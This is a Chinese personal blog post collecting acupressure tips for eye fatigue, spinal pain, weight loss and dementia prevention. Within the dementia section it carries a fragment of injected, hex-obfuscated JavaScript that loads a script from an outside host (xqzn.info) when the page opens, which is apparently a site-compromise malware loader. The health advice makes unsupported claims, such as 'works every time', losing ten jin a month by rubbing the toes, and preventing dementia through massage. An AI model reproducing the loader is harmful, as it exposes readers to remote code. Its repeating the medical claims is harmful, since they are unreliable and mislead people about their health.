登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

晋华博客

大千世界我们一起走过

 
 
 

日志

 
 

收集适宜我的健康知识  

2011-01-20 16:21:48|  分类: 健康 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

(一)舒缓眼睛疲劳的妙方

明眼穴

在我们的姆指上有三个相邻接的穴道分别是明眼、凤眼、大空骨(如上图),明眼、凤眼能够改善眼睛疲劳和急性结膜炎,大空骨则可改善一切有关于眼睛的症状。

       平时眼睛容易疲劳的人,每天要刺激这三个穴道两次。 刺激的方法是,用另一手的拇指和食指夹住,以拇指的指甲分别对这三个穴道施予刺激,只要以稍微感觉到疼痛程度的力气来指压即可。

(二) 颈椎腰椎有病揉此穴

颈椎腰椎有病揉此穴,百用百灵,受用无穷! 颈椎腰椎有病揉此穴,百用百灵,受用无穷 - 海燕 - 海燕颈椎腰椎有病揉此穴,百用百灵,受用无穷颈椎腰椎有病揉此穴,百用百灵,受用无穷 - 海燕 - 海燕 (后溪穴的位置图)  


让双手的后溪穴抵在桌沿或键盘上,来回滚动,揉一揉,每次刺激3~5分钟,每个小时刺激一次就足够了。(注:后溪穴在手侧面小拇指下两三厘米处,见上图)

 (三)每天揉搓脚趾2分钟 月瘦10斤

            脚底存在着各个脏器的反射区,按摩和刺激相应反射区,可以促进局部血液循环,从而达到排毒燃脂的目的,减掉内脏脂肪。各位美眉这种方法的最大特点就是不仅可以减掉多余脂肪,还可以达到淋巴排毒调节内分泌的作用。那么就用每天揉搓脚趾2分钟减肥,既省时又省力,不知不觉中月瘦10斤。

(四)自我按摩以下穴位,可促进脑血循环,能预 防老年痴呆。

一、按摩双侧风池穴、翳风穴。

风池穴在颈部、枕骨之下,微低头,耳后高骨后一横指凹陷处。翳风穴在耳垂后凹陷处。此组穴可改善基底动脉供血情况。

二、按摩四白穴。

四白穴在下眼眶中点,自下约0、5凹陷处。此穴多气多血,刺激该穴对颅内供血作用效果好。

三、按摩印堂穴。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"< 

印堂穴位于两眉头连线中点。该穴有改善脑血循环,活化脑细胞,增强记忆力的作用。

四、刺激委中穴。

委中穴位月国窝横纹中点,属足太阳膀胱经,其经脉循行可以从头顶入里联络于脑。刺激委中穴可直达脑府,使头脑清利,浑身舒爽。

                 以上诸穴,早晚各按一次,一般20分钟,每次任取一组。长期坚持,能有效预防老年痴呆,到耄耆之年,仍能耳聪目明,思维清晰,反应敏捷。[摘自南国报]

(五)

  评论这张
 
阅读(107)| 评论(1)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018